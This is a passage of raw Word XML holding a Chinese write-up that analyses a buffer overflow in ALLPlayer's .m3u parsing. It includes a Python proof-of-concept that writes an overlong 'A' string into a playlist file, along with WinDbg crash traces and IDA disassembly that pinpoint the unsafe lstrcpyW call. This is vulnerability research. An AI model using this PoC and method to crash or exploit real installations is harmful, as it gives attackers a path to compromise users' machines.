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1E82" w14:textId="77777777" w:rsidR="00917C66" w:rsidRPr="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00917C66">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.结合</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00917C66">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00917C66">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>定位漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410FF85F" w14:textId="77777777" w:rsidR="00450FF8" w:rsidRPr="000907E8" w:rsidRDefault="00917C66" w:rsidP="00917C66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>上找到了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18548E75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>junk = "http://"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE9D6D9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>buffer="\x41" * 5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE43372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>exploit = junk + buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C969CEB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</w:p>
    <w:p w14:paraId="290EAAA1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>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B4B25D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 xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00450FF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>out_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00450FF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> = open("ALLPlayer_Poc.m3u",'w')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592B6563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 xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00450FF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>out_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00450FF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>file.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00450FF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>(exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DD6B5E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 xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00450FF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>out_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00450FF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>file.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00450FF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796CDE45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 xml:space="preserve">   print "Exploit file created!" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6097F746" w14:textId="77777777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>except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC030E9" w14:textId="40F61C29" w:rsidR="00450FF8" w:rsidRPr="00450FF8" w:rsidRDefault="00450FF8" w:rsidP="00450FF8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00450FF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">   print "Error"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A6C176" w14:textId="77777777" w:rsidR="00450FF8" w:rsidRDefault="00450FF8" w:rsidP="00917C66"/>
    <w:p w14:paraId="723AA195" w14:textId="6B214424" w:rsidR="00917C66" w:rsidRPr="000907E8" w:rsidRDefault="00917C66" w:rsidP="00917C66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ALLPlayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>生成的ALLPlayer_Poc.m3u，程序崩溃</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F9492C" w14:textId="4B82C133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This exception may be expected and handled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3678E42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=00120041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=066bb35c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=00130000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=066bc8d4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=00001390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=00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D60E86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eip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=7c932f4e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=0012ea2c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=0012ea2c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iopl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up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pl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nz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na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pe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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6CF820C4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cs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=001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b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ss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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=0023  ds=0023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=0023  fs=003b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gs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=0000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efl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=00210206</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060DE33C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ntdll!wcscpy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+0xe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD33B2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7c932f4e 668901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word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ptr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[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],ax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   ds:0023:00130000=6341</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B913684" w14:textId="77777777" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66"/>
    <w:p w14:paraId="5CE51648" w14:textId="5B6BDFD8" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ntdll!wcscpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00917C66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00917C66">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>wcscpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00917C66">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>把从</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00917C66">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00917C66">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>地址开始且含有'\0000'结束符的字符串复制到以</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00917C66">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00917C66">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>开始的地址空间，返回值的类型为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00917C66">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>wchar_t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00917C66">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>* #Unicode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B94A81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7c932f40 8bff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edi,edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="71005AD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7c932f42 55              push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ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35A9823C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7c932f43 8bec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ebp,esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="42F5FE28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7c932f45 8b4d08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ecx,dword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ptr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[ebp+8] </w:t>
      </w:r>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>#char *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strDestination</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C273148" w14:textId="5101B41E" w:rsidR="00917C66" w:rsidRPr="000907E8" w:rsidRDefault="00917C66" w:rsidP="00917C66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7c932f48 8b550c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edx,dword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ptr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[ebp+0Ch]</w:t>
      </w:r>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>#char *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strSource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</w:p>
    <w:p w14:paraId="369A7724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7c932f4b 668b02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ax,word</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ptr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[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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED96DC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7c932f4e 668901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word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ptr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[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],ax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   ds:0023:00130000=6341</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C88239" w14:textId="77777777" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66"/>
    <w:p w14:paraId="565552FE" w14:textId="54775A1A" w:rsidR="00917C66" w:rsidRPr="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00917C66">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00917C66">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>wcscpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00917C66">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225DC31A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__int16 *__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cdecl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wcscpy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__int16 *a1, __int16 *a2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02127459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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19061AC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#   __int16 *des; //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</w:p>
    <w:p w14:paraId="1A3E10BA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__int16 *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sou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; //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edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A145E2D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__int16 index; // ax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6DBD7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</w:p>
    <w:p w14:paraId="3F094A6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des = a1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62782DA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#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sou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= a2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C5083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do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37297A3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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D41AA6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lastRenderedPageBreak/>
        <w:t>#     index = *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sou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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B321963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  *des = *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sou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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C04D61C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  ++des;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6096E6C8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  ++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sou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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1820752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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303C161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#   while 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( index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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C293D6A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  return a1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2525CE0C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# }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365E613A" w14:textId="79827314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# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796433AF" w14:textId="77777777" w:rsidR="00917C66" w:rsidRPr="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC4B0C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dd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ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DBDCF4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0012ea2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0012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ea60 7c80bb10 0012ea88 066bb35c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C5B799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</w:p>
    <w:p w14:paraId="1D215C8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dd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0012ea88                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E64DE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88  00740068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00700074 002f003a 0041002f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5547619F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98  00410041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2E78EE46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0012eaa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7059C14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0012eab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3E58B66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0012eac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6C5B7AB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0012ead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0C7EC54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0012eae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7661DFE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0012eaf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23D8390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</w:p>
    <w:p w14:paraId="390F8DF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dd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066bb35c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C5215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066bb35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00740068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00700074 002f003a 0041002f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399C77FF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066bb36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42B43B5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066bb37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175654CD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066bb38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65FFF32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066bb39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2720A964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ac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2B0F22F8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bc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7EBD3C1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32DACA19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</w:p>
    <w:p w14:paraId="0E87ED5D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kv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FA9B8D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ChildEBP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RetAddr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Args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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to Child              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D23EDF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0012ea2c 7c80bb10 0012ea88 066cb35c 00000000 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ntdll!wcscpy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+0xe (FPO: [Non-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Fpo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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666CCD8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0012ea60 00699632 0012ea88 066cb35c 0012ecf0 kernel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32!lstrcpyW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+0x1c (FPO: [Non-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Fpo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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7714D7A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WARNING: Stack unwind information not available. Following frames may be wrong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A2234A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0012ecdc 00410041 00410041 00410041 00410041 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ALLPlayer!TMethodImplementationIntercept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+0x22cb3e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6830D76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0012ece0 00410041 00410041 00410041 00410041 ALLPlayer+0x10041</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C363B4" w14:textId="20602E3F" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66">
      <w:r>
        <w:t>可以看到ALLPlayer!TMethodImplementationIntercept+0x22cb3e是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ntdll!wcscpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>的调用者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D4C476" w14:textId="77777777" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66"/>
    <w:p w14:paraId="3238E7BD" w14:textId="77777777" w:rsidR="000907E8" w:rsidRDefault="000907E8" w:rsidP="00917C66"/>
    <w:p w14:paraId="6B81B510" w14:textId="462C72B2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在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ida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中找到</w:t>
      </w:r>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ALLPlayer!TMethodImplementationIntercept+0x22cb3e</w:t>
      </w:r>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>处</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0C0A9D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.text:0069960A loc_69960A:                           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;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CODE XREF: .text:006995FC↑j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B002723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.text:0069960A                 push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ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FEA5E73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.text:0069960B                 call    lstrlenW_0_0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3661FA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.text:00699610    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</w:p>
    <w:p w14:paraId="0A59ABEF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.text:00699612    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inc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esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D25A9D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.text:00699613                 lea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, [ebp-254h]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F0A76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.text:00699619    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xor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,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</w:p>
    <w:p w14:paraId="635299D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.text:0069961B    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, 104h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E3D5B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.text:00699620                 call    sub_407B64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298BCCAA" w14:textId="4C1F05AA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.text:00699625                 push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ab/>
      </w:r>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsid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&lt;-------------- </w:t>
      </w:r>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>源字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73376C4C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.text:00699626                 lea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, [ebp-254h]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304297F2" w14:textId="53164E6C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.text:0069962C                 push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    &lt;---------------</w:t>
      </w:r>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>目标缓冲区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CBEDF8" w14:textId="19CB77E1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.text:0069962D                 call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lstrcpyW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&lt;-------------- </w:t>
      </w:r>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>崩溃触发点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B74E868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.text:00699632    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mov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, [ebp+8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F04C927" w14:textId="77777777" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66"/>
    <w:p w14:paraId="05A5C240" w14:textId="77777777" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66">
      <w:r>
        <w:t>#在该函数</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>中下断再</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>重新打开ALLPlayer_Poc.m3u，断下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4319C60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0:005&gt;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bp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ALLPlayer!TMethodImplementationIntercept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+0x22cb1e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECDC30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0:005&gt; g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C05D0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Breakpoint 1 hit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBEB6A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=0000138f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=066bb35c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ecx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=7c809ac6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edx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=0000000a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=0000138f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edi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=00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B730DD3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eip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=00699612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=0012ea70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ebp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=0012ecdc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iopl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nv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up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ei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ng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nz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na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pe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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27E61E9C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cs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=001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b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ss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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=0023  ds=0023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=0023  fs=003b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gs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=0000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efl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>=00200286</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42312109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ALLPlayer!TMethodImplementationIntercept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+0x22cb1e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CD325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00699612 46         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inc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   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esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6811AFF6" w14:textId="77777777" w:rsidR="00917C66" w:rsidRDefault="00917C66" w:rsidP="00917C66"/>
    <w:p w14:paraId="0998679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dd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eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36CA723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0F8D16A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98  00000000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32A9E61F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0012eaa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3AEDFF9D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0012eab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5774076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0012eac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194C93F9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0012ead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29D5689D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0012eae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7B1B088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0012eaf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8  00000000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572222EA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dd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ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53A2542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066bb35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00740068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00700074 002f003a 0041002f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1582702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066bb36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481431F3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066bb37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49CD0534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066bb38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594D722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066bb39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0B205ED1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ac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73E230F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bc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477C9685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066bb3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cc  00410041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00410041 00410041 00410041</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A747A8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 xml:space="preserve">0:000&gt;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dd</w:t>
      </w:r>
      <w:proofErr w:type="spell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0907E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5974BB9E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lastRenderedPageBreak/>
        <w:t>0012ea6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066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bb35c 0012ecf0 00699791 0012ecdc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4E7017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0012ea7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>b55bf8 066bb35c 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522F1E70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0012ea8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74AF80B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0012ea9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c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0BEA822B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eaac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3E906564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eabc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448E88E4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eacc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2B266B52" w14:textId="77777777" w:rsidR="00917C66" w:rsidRPr="000907E8" w:rsidRDefault="00917C66" w:rsidP="00917C66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0012</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>eadc  00000000</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000907E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 00000000 00000000 00000000</w:t>
      </w:r>
